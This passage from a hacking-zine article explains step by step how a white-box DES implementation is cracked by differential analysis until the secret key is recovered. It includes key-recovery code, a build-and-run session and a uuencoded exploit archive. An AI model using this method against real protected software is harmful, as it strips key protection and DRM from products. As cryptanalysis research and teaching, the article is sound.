equation) - X1 being the result of the E-box applied to R1 - r1 being the complementary bits such as the set of X1 and r1 is exactly twice R1 Now let's apply again the differential analysis. It's important to remark that RP() and E() are both linear operations as this simplifies things. Indeed it's well known that: LinearFunc(x [+] y) = LinearFunc(x) [+] LinearFunc(y) Putting everything together this gives us: DELTA(Y)(a,b) = RP(Y_A) [+] RP(Y_B) = RP(Y_A [+] Y_B) = RP(L1_A [+] L1_B || X1_A [+] X1_B || r1_A [+] r1_B) = RP(0 [+] 0 || E(f(0,K0)) [+] E(L0_B [+] f(0,K0)) || r1_a [+] r1_b) = RP(0 || E(f(0,K0) [+] L0_B [+] f(0,K0)z) || r1_A [+] r1_B) = RP(0 || E(L0_B) || r1_A [+] r1_B) If the bit set in L0 is a middle bit then: - Weight(E(L0_B)) = 1 and Weight(r1_A [+] r1_B)) = 1 If the bit set in L0 isn't a middle bit then: - Weight(E(L0_B)) = 2 and Weight(r1_A [+] r1_B)) = 0 In both cases, Weight(RP(0 || E(L0_B) || r1_A [+] r1_B)) = 2, RP having no effect on the weight since it only permutes bits. This means that 1 bit modification should have a visible impact on 'at most' 2 nibbles. 'at most' and not 'exactly' because with the effect of RP() the two bits could be located in the same nibble. Let's see if we are right: --------------------------------------------------------------------------- b_01 :: 00 05 d0 00 00 00 00 00 00 00 00 00 <-- 2 modified nibbles b_03 :: 00 00 00 03 60 00 00 00 00 00 00 00 <-- 2 modified nibbles b_05 :: 00 00 00 00 00 04 e0 00 00 00 00 00 <-- 2 modified nibbles b_07 :: 90 00 00 00 00 00 00 08 00 00 00 00 ... b_09 :: 00 0b 00 00 00 00 00 00 05 00 00 00 b_11 :: 00 00 00 0f 00 00 00 00 00 08 00 00 b_13 :: 00 00 00 00 00 0d 00 00 00 00 0f 00 b_15 :: 00 00 00 00 00 00 00 0f 00 00 00 06 b_17 :: 00 04 00 00 00 00 00 00 0c 00 00 00 b_19 :: 00 00 00 09 00 00 00 00 00 0f 00 00 b_21 :: 00 00 00 00 00 08 00 00 00 00 06 00 b_23 :: 00 00 00 00 00 00 00 0d 00 00 00 08 b_25 :: 08 d0 00 00 00 00 00 00 00 00 00 00 b_27 :: 00 00 04 20 00 00 00 00 00 00 00 00 b_29 :: 00 00 00 00 05 80 00 00 00 00 00 00 b_31 :: 00 00 00 00 00 00 04 20 00 00 00 00 b_33 :: 02 70 00 00 00 00 00 00 00 00 00 00 b_35 :: 00 00 0c f0 00 00 00 00 00 00 00 00 b_37 :: 00 00 00 00 0d b0 00 00 00 00 00 00 b_39 :: 00 00 00 00 00 00 0f a0 00 00 00 00 b_41 :: 0c 00 00 00 00 00 00 00 0f 00 00 00 b_43 :: 00 00 0d 00 00 00 00 00 00 02 00 00 b_45 :: 00 00 00 00 09 00 00 00 00 00 05 00 b_47 :: 00 00 00 00 00 00 03 00 00 00 00 03 b_49 :: 0f 00 00 00 00 00 00 00 0d 00 00 00 b_51 :: 00 00 06 00 00 00 00 00 00 03 00 00 b_53 :: 00 00 00 00 0b 00 00 00 00 00 0c 00 b_55 :: 00 00 00 00 00 00 02 00 00 00 00 01 b_57 :: b0 00 00 00 00 00 00 0c 00 00 00 00 b_59 :: 00 03 60 00 00 00 00 00 00 00 00 00 b_61 :: 00 00 00 0e 40 00 00 00 00 00 00 00 b_63 :: 00 00 00 00 00 0b f0 00 00 00 00 00 --------------------------------------------------------------------------- And that's exactly what we were expecting :) Well to be honest, I first observed the result of the differential analysis, then remarked a 'strange' behavior related to the odd bits and finally figured out why using maths ;) One cool thing with this situation is that we can easily leak the position of the specific S-Boxes inside the T-Boxes. First let's compare the differential analysis of even bits 28,36,52,60 and of odd bit 1: --------------------------------------------------------------------------- b_01 :: 00 05 d0 00 00 00 00 00 00 00 00 00 b_28 :: 0d 75 dd 00 00 00 04 20 0f d2 00 00 b_36 :: 0c 05 d0 00 09 00 04 20 cf 00 05 00 b_52 :: 00 05 d0 09 00 00 00 00 90 0f 00 00 b_60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01 --------------------------------------------------------------------------- Obviously setting these even bits one by one induces the same modification (amongst others) as setting the odd bit 1 (nibbles 01L (0x5) and 02H (0xd)) so there must be some kind of mathematical link between them because the other bits do not have such property. Playing with Sbox ------------------ The reason behind this behavior is very simple to explain. But first, let's take back the example of plaintext 'A' (null vector): We know that: R1_A = L0_a [+] P(S1[0 [+] k0] || S2[0 [+] k1] || ... || S8[0 [+] k7]) R1_A = 0 [+] P(S1[k0] || S2[k0] || ... || S8[k7]) R1_A = P( S1[k0] || S2[k1] || ... || S8[k7] ) Where: The ki being 6 bits vectors (0 <= i < 8) K0 = k0 || k1 || k2 ... || k7 Thus in the case of plaintext 0 (A), R1_A is the permutation of the Sbox output whose inputs are the bits of the first subkey. Now let us focus on 1 of the 4 bits generated by an Sbox S (which could be any of the 8). We do not know its value (b) but when the P-box is applied it will be located in a particular nibble as illustrated below: R1_A = f(R0,K0) = ???? ?b?? ???? ???? ???? ???? ???? ???? ^ |__ The bit <-------------------------------------> (4bits x 8) = 32 bits state Because a WB DES implementation is working with a duplicated Rx this will give us the following internal state: ... ??b? ???? ???? ???b ... ^ ^ | | -------------------- b is duplicated <-------------------------> 96 bits state Now following what was explained previously with odd bits, out of the 32 possible B, one of them will affect b when L0_B is XORed with f(0,K0) So considering a 96 bits internal state inside the WB, this gives us: ... ??a? ???? ???? ???a ... With: a = b [+] 1 As a result, the differential between A and B would be: ... ??b? ???? ???? ???b ... (from A) [+] ... ??a? ???? ???? ???a ... (from B) = ... ??1? ???? ???? ???1 ... ( because a [+] b = a [+] a [+] 1 = 1 ) From now on, we will call this differential our 'witness' and by extension, the two nibbles where b=1 the 2 witness nibbles. Playing with the witness ------------------------ Now imagine that we're using another plaintext (X) with weight 1 and whose weight is in one of the 6 possible bits influencing Sbox S. There are two possible situations: - S still produces b - S now produces b+1 If we perform a differential analysis between X and A (null vector) this gives us: case 1: ======= ... ??b? ???? ???? ???b ... (from A) [+] ... ??b? ???? ???? ???b ... (from X) = ... ??0? ???? ???? ???0 ... <-- useless output case 2: ======= ... ??b? ???? ???? ???b ... (from A) [+] ... ??a? ???? ???? ???a ... (from X) = ... ??1? ???? ???? ???1 ... <-- witness vector :))) So case 2 is perfect because it gives us a distinguisher. We can test all 32 possible X (each of them having a different even bit set) and observe the ones which produce the witness vector associated with b. This is exactly what we did implicitly when we discovered the link between bits 28, 36, 52 and 60. Or if you're lost let's say that we've just discovered something huge: the bits 28, 36, 52 and 60 are the input of the same Sbox and bit 1 is one of the output of this Sbox. At this point the protection took a heavy hit. Remark: The first subkey is modifying the input sent to the Sbox. As a consequence the relation previously found is "key dependent". This will be of importance later, keep reading! Going further ------------- Let's think. At this point and thanks to our analysis of wb_init() we're almost sure that there is no external encoding applied to the input. So there should be a match between our practical results and the theoretical relations in the original DES algorithm. To verify my theory, I wrote a little script to compute the positions of the bits involved with each Sbox: --------------------------------------------------------------------------- $ ./bitmapping.py [6, 56, 48, 40, 32, 24] <-- Sbox 1 [32, 24, 16, 8, 0, 58] <-- Sbox 2 [0, 58, 50, 42, 34, 26] [34, 26, 18, 10, 2, 60] [2, 60, 52, 44, 36, 28] <-- Sbox 5 [36, 28, 20, 12, 4, 62] [4, 62, 54, 46, 38, 30] [38, 30, 22, 14, 6, 56] <-- Sbox 8 --------------------------------------------------------------------------- Oh interesting so Sbox 5 seems to match with our practical result. Going deeper, we need to check if bit 01 is involved with this Sbox. Again I wrote another script to compute the position of odd bits involved with the Sbox in the original DES and this gives us: --------------------------------------------------------------------------- $ ./sbox.py | grep 'SBOX 5' bit 41 XORED with bit 00 of SBOX 5 (19) bit 01 XORED with bit 03 of SBOX 5 (16) bit 19 XORED with bit 02 of SBOX 5 (17) bit 63 XORED with bit 01 of SBOX 5 (18) --------------------------------------------------------------------------- So bit 01 is indeed involved. However let's try to be careful. In cryptanalysis it's easy to be fooled, so let's make extra checks. For example can we link a subset of even bits {2, 28, 36, 44, 52, 60} with bit 19 of the same Sbox? --------------------------------------------------------------------------- 19 :: 00 00 00 09 00 00 00 00 00 0f 00 00 2 :: 0c 00 06 00 00 0b f2 60 0f 03 00 01 28 :: 0d 75 dd 00 00 00 04 20 0f d2 00 00 36 :: 0c 05 d0 00 09 00 04 20 cf 00 05 00 44 :: 00 00 00 09 00 0b f0 00 20 0f 00 00 52 :: 00 05 d0 09 00 00 00 00 90 0f 00 00 60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01 --------------------------------------------------------------------------- Bit 19 is linked to bit 44 and 52 => YES. At this point, we should check automatically that the bit relations are satisfied for all the Sbox but it's tedious. That's the problem :-P Because I was lazy, I manually checked all the relations. Fortunately with the help of scripts, this only took me a couple of minutes and it was a 100% match. Again, this proves nothing but as I said earlier, we're working with guesses. Towards a perfect understanding of differential analysis -------------------------------------------------------- Didn't you notice something particular with bit 02, 28 and 60? Well the 'impacted' nibbles were neither 0 nor a witness nibble. For example consider bit 60: --------------------------------------------------------------------------- 19 :: 00 00 00 09 00 00 00 00 00 0f 00 00 60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01 --------------------------------------------------------------------------- The first impacted nibble '0x9' is a good one (witness nibble) but the second one is neither '0x0' nor '0xf' (witness). How is that possible? Well the answer lies in both: - the (non)-middle bits - the P-box Indeed if you consider the bits sent to Sbox 5, you have to know that: - bits 02 and 60 are sent to both Sbox 4 & 5 - bits 52 and 44 are sent to Sbox 5 - bits 36 and 28 are sent to both Sbox 5 & 6 So when 1 non-middle bit is set, this will impact the output of 2 Sbox and we're unlucky, the P-box will have the unfortunate effect of setting them in the same nibble, hence the difference observed. ----[ 6.3 - Recovering the first subkey If the relations observed are 'key dependent', considering the fact that the S-Boxes are known (which means unmodified otherwise this would be cheating :p) then isn't this an indirect leak on the key itself that could be transformed in a key recovery? Oh yes it is :-) First cryptanalysis ------------------- The main idea is really simple: we know that for a given subkey, several unitary vectors (plaintexts of weight 1) will produce the same output bit. Let's take again the previous case. We have: .------.------.------.-----.-----.------. | b_02 | b_60 | b_52 |b_44 |b_36 | b_28 | '------'------'------'-----'-----'------' ..... . + . ..... .------.------.------.-----.-----.------. | k24 | k25 | k26 | k27 | k28 | k29 | '------'------'------'-----'-----'------' | v ********************* * Sbox 5 * ********************* | v .------.------.------.-----. | y0 | y1 | y2 | y3 | '------'------'------'-----' Let us consider bit 01. We know that it will be XORed to y2 so from the differential analysis we can derive the set of relations: [ k24 [+] 0, k25 [+] 1, k26 [+] 0, k27 [+] 0, k28 [+] 0, k29 [+] 0 ] => b [ k24 [+] 0, k25 [+] 0, k26 [+] 1, k27 [+] 0, k28 [+] 0, k29 [+] 0 ] => b [ k24 [+] 0, k25 [+] 0, k26 [+] 0, k27 [+] 0, k28 [+] 1, k29 [+] 0 ] => b [ k24 [+] 0, k25 [+] 0, k26 [+] 0, k27 [+] 0, k28 [+] 0, k29 [+] 1 ] => b So amongst all possible sets {k24,k25,k26,k27,k28,k29}, only a few of them (including the one from the real subkey) will satisfy the relations. Testing all possible sets (there are 2^6 = 64 of them) will give us 2 lists because we do not know if b=1 or b=0 so we have to consider both cases. Applying this technique to both y0, y1, y2 and y3 will allow to filter efficiently the number of possible candidates as we will only consider those present in all lists. The success of this cryptanalysis is highly dependent on the number of relations that we will be able to create for a particular S-Box. Practically speaking, this is sufficient to recover the first subkey as the complexity should be far below 2^48. Should be? Yes I didn't test it... I found even better. Immediate subkey recovery ------------------------- As I said above, our success is dependent of the number of equations so improving the cryptanalysis can be done by finding ways to increase this number. There are two obvious ways to do that: - There may exist combinations of input bits other than unitary vectors (weight > 1) which can produce the witness nibbles in a differential analysis. - If the impacted nibbles are both 0x0 then this gives us a new relation where expected output bit is b [+] 1 Practically speaking this gives us the following result for Sbox5 and bit 01: --------------------------------------------------------------------------- $ ./exploit [...] { 1 0 0 0 0 0 } = { 1 } <-- dumping relations for S5 & bit 01 { 0 1 0 0 0 0 } = { 0 } { 1 1 0 0 0 0 } = { 0 } { 0 0 1 0 0 0 } = { 0 } { 1 0 1 0 0 0 } = { 1 } { 0 1 1 0 0 0 } = { 1 } { 1 1 1 0 0 0 } = { 1 } { 0 0 0 1 0 0 } = { 1 } { 1 0 0 1 0 0 } = { 0 } { 0 1 0 1 0 0 } = { 0 } { 1 1 0 1 0 0 } = { 1 } { 0 0 1 1 0 0 } = { 1 } { 1 0 1 1 0 0 } = { 0 } { 0 1 1 1 0 0 } = { 1 } { 1 1 1 1 0 0 } = { 0 } { 0 0 0 0 1 0 } = { 0 } { 1 0 0 0 1 0 } = { 1 } { 0 1 0 0 1 0 } = { 0 } { 1 1 0 0 1 0 } = { 0 } { 0 0 1 0 1 0 } = { 1 } { 1 0 1 0 1 0 } = { 0 } { 0 1 1 0 1 0 } = { 0 } { 1 1 1 0 1 0 } = { 1 } { 0 0 0 1 1 0 } = { 0 } { 1 0 0 1 1 0 } = { 0 } { 0 1 0 1 1 0 } = { 1 } { 1 1 0 1 1 0 } = { 0 } { 0 1 0 1 0 1 } = { 1 } [...] [ key candidate is 31] --------------------------------------------------------------------------- The cryptanalysts have the habit to always evaluate the complexity of their attacks but in this case let's say that it's useless. Only one subkey appeared to be valid out of the 2^48 possible ones. ----[ 6.4 - Recovering the original key Now that we've retrieved the first subkey, our goal is almost reached. So how do we retrieve the secret key? Well DES subkeys can be seen as truncated permutations of the original key. This means that we now have 48 out of the 56 bits of the original key. I could explain the key scheduling mechanism of the DES, but it's useless as the only important thing is to be able to reverse the permutation. This is done easily thanks to the following python manipulation applied to the sKMap1 array, itself being shamelessly ripped from [13]: --------------------------------------------------------------------------- >>> InvsKMap1 = [ -1 for i in xrange(64) ] >>> for x in xrange(len(InvsKMap1)): ... if 7-x%8 == 0: ... InvsKMap1[x] = -2 ... >>> for x in xrange(64): ... if x in sKMap1: ... InvsKMap1[x] = sKMap1.index(x) ... >>> InvsKMap1 [19, 8, 12, 29, 32, -1, -1, -2, 9, 0, -1, -1, 44, 43, 40, -2, 5, 22, 10, 41, 37, 24, 34, -2, 15, 14, 21, 25, 35, 31, 47, -2, 6, 2, 13, 20, 28, 38, 26, -2, 23, 11, -1, 16, 42, -1, 30, -2, 4, -1, 1, -1, 33, 27, 46, -2, 7, 17, 18, 3, 36, 45, 39, -2] >>> --------------------------------------------------------------------------- Here is the resulting array: char InvsKMap1[64] = { 19, 8, 12, 29, 32, -1, -1, -2, 9, 0, -1, -1, 44, 43, 40, -2, 5, 22, 10, 41, 37, 24, 34, -2, 15, 14, 21, 25, 35, 31, 47, -2, 6, 2, 13, 20, 28, 38, 26, -2, 23, 11, -1, 16, 42, -1, 30, -2, 4, -1, 1, -1, 33, 27, 46, -2, 7, 17, 18, 3, 36, 45, 39, -2 }; My exploit uses this array to build an original key out of both the subkey bits and an 8 bits vector. '-1' is set for a bit position where the value has to be guessed. There are 8 such positions, and for each of them, a bit is taken from the 8 bits vector. '-2' means that the bit can be anything. Indeed the most significant bits (the so-called parity bits) of the 8 bytes key array are never taken into account (hence the well known 8 x 7 = 56 bits keylength). Now the only remaining thing to do is to guess these 8 missing bits. Obviously for each guess you will generate an original key 'K' and test it against a known couple of input/output generated by the white-box. The whole operation was implemented below: --------------------------------------------------------------------------- void RebuildKeyFromSk1(uchar *dst, uchar *src, uchar lastbits) { int i,j; char *plastbits = (char *)&lastbits; memset(dst, 0, DES_KEY_LENGTH); for(i=0,j=0; i<64; i++) { // Parity bit if(InvsKMap1[i] == -2) continue; // Bit is guessed else if(InvsKMap1[i] == -1) { if(GETBIT(plastbits,j)) SETBIT(dst,i); j++; } // Bit is already known else { if(GETBIT(src, InvsKMap1[i])) SETBIT(dst,i); } } return; } [...] const_DES_cblock in = "\x12\x32\xe7\xd3\x0f\xf1\x29\xb3"; const_DES_cblock expected = "\xa1\x6b\xd2\xeb\xbf\xe1\xd1\xc2"; DES_cblock key; DES_cblock out; DES_key_schedule ks; for(missing_bits=0; missing_bits<256; missing_bits++) { RebuildKeyFromSk1(key, sk, missing_bits); memset(out, 0, sizeof out); DES_set_key(&key, &ks); DES_ecb_encrypt(&in, &out, &ks, DES_ENCRYPT); if(!memcmp(out,expected,DES_BLOCK_LENGTH)) { printf("[+] Key was found!\n"); [...] } } --------------------------------------------------------------------------- The whole cryptanalysis of the white-box is very effective and allows us to retrieve a key in a few ms. More precisely it retrieves _1_ of the 256 possible 8 bytes key ;) --------------------------------------------------------------------------- $ tar xfz p68-exploit.tgz; cd p68-exploit $ wget http://homes.esat.kuleuven.be/~bwyseur/research/wbDES $ md5sum wbDES b9c4c69b08e12f577c91ec186edc5355 wbDES # you can never be sure ;-) $ for f in scripts/*.gdb; do gdb -x $f; done > /dev/null # is quite long $ make gcc -c wb_init.c -O3 -Wall gcc -c wb_round.c -O3 -Wall gcc -c wb_final.c -O3 -Wall gcc exploit.c *.o -O3 -Wall -o exploit -lm -lcrypto gcc wb_main.c *.o -O3 -Wall -o wbdes.try gcc entropy.c -o entropy -lm $ ./exploit [+] Number of possible candidates = 256 -> Required computation is 2^(8) * DES() [+] Key was found! -> Missing bits: 0x3d -> Key: '02424626' $ --------------------------------------------------------------------------- And that's it! So the key was bf-able after all ;> --[ 7 - Conclusion Nowadays there are a lot of white-box protections in the wild (DRM but not only) using either academic designs or their improvements. Each of them is an interesting challenge which is why you may want to face it one day. This paper is not ground breaking nor even relevant for the average cryptographer, the cryptanalysis of the naked DES being covered in many papers including [R16]. I wrote it however with the hope that it would give you an overview of what practical white-box cracking could be. I hope you enjoyed it :) Feel free to contact me for any question related to this paper using the mail alias provided in the title of the paper. --[ 8 - Gr33tz Many (randomly ordered) thanks to: - the #f4lst4ff crypt0/b33r team for introducing me to the concept of white-box a few years ago. - Jb & Brecht for their implementations which gave me a lot of fun :) - X, Y, Z who will remain anonymous but nonetheless helped me to improve _significantly_ the paper. If you managed to understand a few things out of this "blabla" then you must thank them (and especially X). I owe you big time man :) - asciio authors because without this tool I would never have found the courage to write the paper - The Phrack Staff for publishing it --[ 9 - References [R01] http://en.wikipedia.org/wiki/Feistel_cipher [R02] http://2009.hack.lu/index.php/ReverseChallenge [R03] http://baboon.rce.free.fr/index.php?post/2009/11/20/ HackLu-Reverse-Challenge [R04] http://www.whiteboxcrypto.com [R05] "Cryptanalysis of a White Box AES Implementation", Billet et al. http://bo.blackowl.org/papers/waes.pdf [R06] "Digital content protection: How to crack DRM and make them more resistant", Jean-Baptiste Bedrune http://esec-lab.sogeti.com/dotclear/public/publications/ 10-hitbkl-drm.pdf [R07] "White-Box Cryptography and an AES Implementation", Eisen et al. http://www.scs.carleton.ca/%7Epaulv/papers/whiteaes.lncs.ps [R08] "White-Box Cryptography and SPN ciphers", Schelkunov http://eprint.iacr.org/2010/419.pdf [R09] "A White-box DES Implementation for DRM Applications", Chow et al. http://www.scs.carleton.ca/%7Epaulv/papers/whitedes1.ps [R10] "White-Box Cryptography", James Muir, Irdeto http://www.mitacs.ca/events/images/stories/focusperiods/ security-presentations/jmuir-mitacs-white-box-cryptography.pdf [R11] http://search.cpan.org/dist/App-Asciio/lib/App/Asciio.pm#NAME [R12] http://dhost.info/pasjagor/des/start.php [R13] "Cryptography: Theory and Practice", D. Stinson, 1st edition [R14] "Clarifying Obfuscation: Improving the Security of White-Box Encoding", Link et al. http://eprint.iacr.org/2004/025.pdf [R15] "White-Box Cryptography" (PhD thesis), B. Wyseur https://www.cosic.esat.kuleuven.be/publications/thesis-152.pdf [R16] "Attacking an obfuscated cipher by injecting faults", Jacob et al. http://www.cs.princeton.edu/~mjacob/papers/drm1.pdf [R17] "Cryptanalysis of White-Box DES Implementations with Arbitrary External Encodings", B. Wyseur http://eprint.iacr.org/2007/104.pdf --[ 10 - Appendix begin 644 p68-exploit.tgz M'XL(``$N74\``^Q<>W,:Q[+WO_`I)DY9`1G)^P9)H)0?=J:GNZ>GIZ?G-R,OO-9>L%Y, MHS!Y\>1O^ACP:;HN/LVF:^I/^7EBFDVK:5E>T_&>&/#BF$^8^W(O M&7L2W\:3^^@>JO\?^EEHX_^+/PG&X33XJV7@`'N.LW'\7<^C\?>:INDUP4], MVS&:3YCQ5RM2]OD_/O[^='K(HL%-S(07L"^#41`GRUL6S)-EM+BM5K'ZL%JY M&@[9WA#J^^$\3/;AY[\!![UN&:WFHTV5XW#N3S.552'V4,K?'_(&ZI7M M[D=I`[87*4WWIC/X#I>WBR2J5J7>ARAHYH=SR4F]%CE1FWUH!'KPWA[*;BL] MY"M)YB\HN3J7ZY.W33.NS7R_RS5O0+&A=KDU@ MX3K`;@Q?_W(]P-]NMOF[DW]FVF(;&^A<$-L$L0<@]M7KR_6;MY?KMV;:]K=7 M)7J;%C2&;P"-1S87/,:^`*.!G6E`Z@=0!E(_@.K:>IT5Z_ M__3J]*+&SB\^-=CIF]]9G=58#=[JW1J\UE^T>FRGP_ZC9H`E6;O-:DVVQVI4 M]ZQ5K]=9/@PSIAAI?,Y/+A[4Z=\=MHU*G-4#*F5XE2GT4XE"P"7+ILZ. MC_.J`.$.0]9Y7M96S%(^G`NHE'&X5^_/7K_KOS_Y\-/%SY56P1=%1:[FPZ?^ M^:NSW_5B\*'SBY<7)ZJ%:=$4_+B,D@@G'Y^&-.'4ZLT7^!HOW&TP"`;UH^KG M*!S)S""MVT"4XY"CXAK`;P@I;+R:#Y,PFI,BU'ZTFBWZ@]5X'"QKO.%B"=U9 M*SY01ZQ8'/XKJ%>_5BOX$G8,8%T)QS5.7J]6*@N4,JX]?1:SIPU1C$3C:%D[ M8F$;&<#S^?,,\;ZU!G(&8KIA#^A5S>7\*;XN@V2UG!]5[Z@G8'IVOC>(UAEC MGK^*UEUM5'I=S^FQ#BC+X/.5,6AY;F`#?#>=!F,&?.%INO"UX7<3OB8O8U:# M:+".?IN"ID4TQ(/!NVGP+_/XU[3$%_E@VP/Q=84\*:$@9IFCG"!DM(=<6 M^GB"CR5H3>+#^^)R_DKN02J'^.EZ&D(7C_\V;6)QU]"M9"HKN8*3WGM'<&V* M'KM"JB5H4QK>PP.N&=$;6@^D5E:JC;0469MKRGD8@EY:IRG:FH*7M*P^FHX8 M34OPD'JVTI%2?;"$;,E'CKHB9[+OU2CI:A^9+T?U/S?4?( MM@NCP_LH+`FAKF@E6UJ)*&RMA[(GTM[Z+')3K<78IE;2),I9DO%^.9.D!=08 M-M1HDHC+2/[)/0IZ$GZE%C)45;2[&WJO97CWQ1< MA*^IN.2E?D#2W$8FYM"L!J8RT\EK@+C51\.6A(RZB80AK( M62/'6/J,U*BI17-;Q1`5VU0\M#7Y^OBGDH^<^9*_C!AR]LEH8FIZ&HUL M#"NSDJ=\2J:S5OB1OGY1>U>SGNX!MO2`$BLUE2_)\=MEX(&.,LF;JH\H/F!;#E%])>=+7+,TZ:9:0KI/".FJ. M'&B^(W63,5<;,=/D5JK>0;Y&&54,*58_^!S,^X,PB7.Y%:16#/+`K]3>A:\# M/!R088-)"1C+5[`)(JRG8N%#LPA#9\ MK::L(IN9X!66&DU91;9RHS3V*R=4P:*^"Y,&DHTVB<;-^0;&K@Q`R&LHLR4J=->S(9!F[VL,LEUP#R' MB=X*W>*T;\*2Q:Z9V#7L`&XT8>_H.6KG*'`-.0AA3VC-0FZ.TE9@V6WLD3.( MQETKT,R2MTM:S[(%W#R5.VZA5^@#9!SN,,Q?+OW;U"P9;]*-DZG8LKO%WLK. M9ITV['5G&)5RBF/A'TP?:2BAKNA;\^P$H85##/;&66)M,4UT1C4"(3"DAJ,U MS17.-`1E%*2)-#>9Z:.ST$VIERN88J,A;[#BINW!/]QX7RMH08&8A&`V0D]V MZSNH3@6!$0E1+<+&39WL+5TW8Y[4?W-KKNQJKWM#N`A:_.XA/;?U[PTJY(NY M*W-?S[A[*6%)H>;W9;YM;71N:^.8,/'Y!A^WE).7J;J=IZ>HV0/.J;MDB)U1 MP%:R=\S>``=$Y#R;=)&AD4&/&*8([-GH0A2<3>Y@D'MTG07T3Q44IH("&DJCG*:#P&OSH2+`VRX/OH"WO! M'/K]E^-NSL9W'`*]O-M2G(`^B5$ M=)B1S@CS*&QW//LH?-ZQM@WW7T5,RVV(TFZD"7]D3W\^ M_>GGIPR"WONSWQYH(T?H?BKP@G3!O3\0OJ;;$BH.RO.5^)`MP\4"2S!R_?CC MC^SP.#UT^1@L9ZLDD&PX!GTV"6W*7F!%U"/X4)6P(A@]'P3+`B1+@:N%Z`Z3=A]YA9=)':91>M$E$`C/OQ\#H8K6`R M3&(QH&`B-#?:X>P=XX,+U+!'50,(+/3<"5[K@B74(MO:#OS38#N36%8$PT$_ MF-/]GMH.9GL[Q`0H&J3QR8?7G_[Y\:(N#O:^`TG#V8(D25LU\EMS&N8E13*3 M%#Y[AYL2/L;8CS1VP;(DI6<7\%W4)5>$_H4HGX$O38)XP5R M$]%(#HTB0HFHJLW14H0#'0[!(CIJM8`<,5D$7!&.].0)UP'':.DDP!+8IT-( MJP:?GLX_BX[1:3YVS#Q(CPU0&/9HSQ1?^%VMR",]6>J('B$\+2A<@=T:U']2 M#/N--N`4ICB(HIZZW`2V0#D%#T^![]0Y1)71'F@H3F&)XP+4`6WO"$WM5`^' MES!!A:.%=G44#SH,:?*18L+2B-,B'KQG<4O!O'H9QZL9IG7)M9_@7+J&24]3 M;1PN)A M1G$51;"SK*`()IWP>U;2''.)^8#V0P*0;[:#N<&%U".H,A:":2PW?J. M+-/`')FV9._F:+EKXZ8,&8'9\]%?ALDM]HQG+*ESA>!;';`G)2RPGD.RM`I0 M)B%U$(@@N[A:!7$;;$E5KZ\U$T4[F43*/TXG".,?W[<(SW*OO]$9CTJM_/;KHVV;DN-A0Z1L.Q MH9^">;#TZ<(62#F$#1;-WZ+3W]LTG"]6"3;&U:=D=?X^F(]"S%L>F32FABW- M'.7>!H=.*,[]$\*\PO1R(YD9V;;E>MD2/6'",5/^DQDY64@>7XQ.6B.NFBZ! M%-.7\\)J?J^_%$PH)>UH]8])OQ^7)7PM\W0\97KS#/7;. M#,(K*L73A_>#/-'0%?ZYHSQ%W/;O7]9Z;$,6T$T;1 M^/PVOL#4QE#8((>6_\PBRAP&@"%"\$*_A$GKW09H&4=;:B'E:?`RZ^)FN@._ M>CK2W)!2LN9&1?=E'\OL_I4]S2-`Z6F)=MW3I.N>Q"XU42@..32.=V@61O1W M!#(5FW@]/E0P)-QVL%49@>Y),,=-7Y\G/O=84N4I.&7I#(Y7TSMNK,I!-3'" M:X3O(,0)%`^K)7Z2;BXXHHCG@?[4$C4BYQ%@HS@W@K<&+[2RI9;40I?X@T570N2-@351?_*;W)=)ER`OY2.8D^*"`9&"YN(DLU*4XM4RT"FM,H%RFFB1$E[X*;$6'Y7H M_GT,"C)X_[?@I+5`@8/82G\0[1] MK+@X>W-VR$Y9?!VMIAB*UA2`_>75:@;Q*&;3:,J.]NJH%7C9$,+)-)P'/'#1 MA0!,2R!_D%NG"8]%H2&>IGA:XFGC%I&O`XXHJ[6A= M-GK[-#2AT6O4W+U:^,RKUS.X+NDHSWY;A3ZS;9FL+ M`9848#U"?^+/R@'>1U@)*#$UIBTYTL/W9(M[+X7L_9P=(ZG*9NA1Z&NH545D="RVC) M&C>]'L]R-GJ:1+N(#T?9+"W=*1V!3695[KG90T3.)9*9[IWI&]7N M7H\?I>*DZG\XN^BSLW??B3U^)5B'2>WD]].+_MN7I^]__70B%P_DJ0ZB2EAJ MASW?P'DC1%@4M)'T,5)ASI5?0Z[3/K;LZ0Q< M]1*$WOX+,P'MUAYO*J"G$J9JZR00?]A+A(32I/?<[.QDST5%/FMP#XE7U3JY MOS0`(3TQD_EUD=LD,(&J<-]%,`!R=3,FT\BZIU%)DV@\?DB,N*RGM;A?1HX> MMLX/2<`;AAKY_>PE,7XEP(N[:]VO\)U#4P(G,7,XB5B/Z&I=[GIK=]+KDO5[ MQ\=H';P6]Y:NHV%/^#*YL\,>T&X]L1Z(W&3 MRF/'IK/MV.2LTQ%6%8K>JR?]]8^`R,31WE9-1,?T&I6UE$$Z"DN&B$!'@2EF M0W>LOK`IO](233]#4IE\)^?"!B"5I",OQJTJGGDL!>///L\K2JM44D8YAV"R M\^UQL(DU&>)U9#+;G5UP>9RZ;)S&YGP[[NIE'L0$_]?$@EP#SJ,V]1ZK3:>1GY2GT97 M\FO4H6H%6=6;M0XB@;JL_O9JD![BAT0C!$:U&:#="IQ&ZC=!KA$VZ M%F-T0K,36IW0[H1.)W0[H=<)FYWTTK-!*Z'1SB)46M9KT&`1K4FT9CL+-VFT M9DIK$:W5SB)'&JV5TMI$:[>S*)!&:Z>T#M$Z[2RBH]$Z*:U+M&X[B\YHM&Y* MZQ&MU\XB+1JME](VB;;9SJ(F&FTS/5O-'ZZK/]B89/Y(8T(S3`I6K>.&@>">A_*J!2+2^X4A: M_!%0Z5DS&&Q2.&.N5.Z_,E8\2$Z/D!]_AORX0V2Q*NMA!WK$OOCX-RFK^4CM M*7(GR[_P+HI396,MSY5+^IYM"-P/V0^2IY;K9N\YI-M986[J5Q@3+[0TW7MA M(CU0YXS#_VSOZIL:N9'^WYY/H2.[P0;#CN;5YN6>>K(O55NU=9=*DN_^J+OU/B,#.4*>RXWJ+HNE'JF[I6EI)/6OUX:R3"XI<-_$ MHWK_'MFE"Q:&]E>'V74TB[)(?AG'UE8!?<;9WVAX*7P*'P;7PL:"!J?L9%I? M?!0?K3M]][@\A@W)/QJUK$N/E6S\/X/>^+AMW('_618IX/\599+PF.>(_UXJDL?C6EE]=W6Z?K<'MF5.ZE"4FK]EGNM^Q%-_KVZ?'L\@'\7)OP=,6 M;?-J/!WOF?O?$NC*V6.#9SE7;G'5;+'%QR_/`G2)2S<*T>4.W2A87^'2!>L; M.W1EJ+XD=NE"]26I0U<$Z\MG+EVP/F?0Q*^#]94N7:B^PADT 